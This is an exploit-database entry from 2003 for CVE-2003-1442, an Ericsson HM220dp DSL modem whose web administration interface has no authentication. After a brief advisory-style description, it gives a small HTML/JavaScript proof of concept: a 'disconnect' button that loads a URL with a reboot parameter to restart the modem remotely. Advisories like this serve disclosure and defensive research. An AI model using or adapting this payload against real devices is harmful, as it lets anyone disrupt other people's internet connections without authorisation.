Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability

2003-02-11T00:00:00
ID EDB-ID:22244
Type exploitdb
Reporter Davide Del Vecchio
Modified 2003-02-11T00:00:00

Description

Ericsson HM220dp DSL Modem World Accessible Web Administration Interface Vulnerability. CVE-2003-1442 . Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/6824/info

The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement. 

[script]
function exploit(){
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
}
[/script]
[input type="button" value="disconnect" onClick="exploit();"]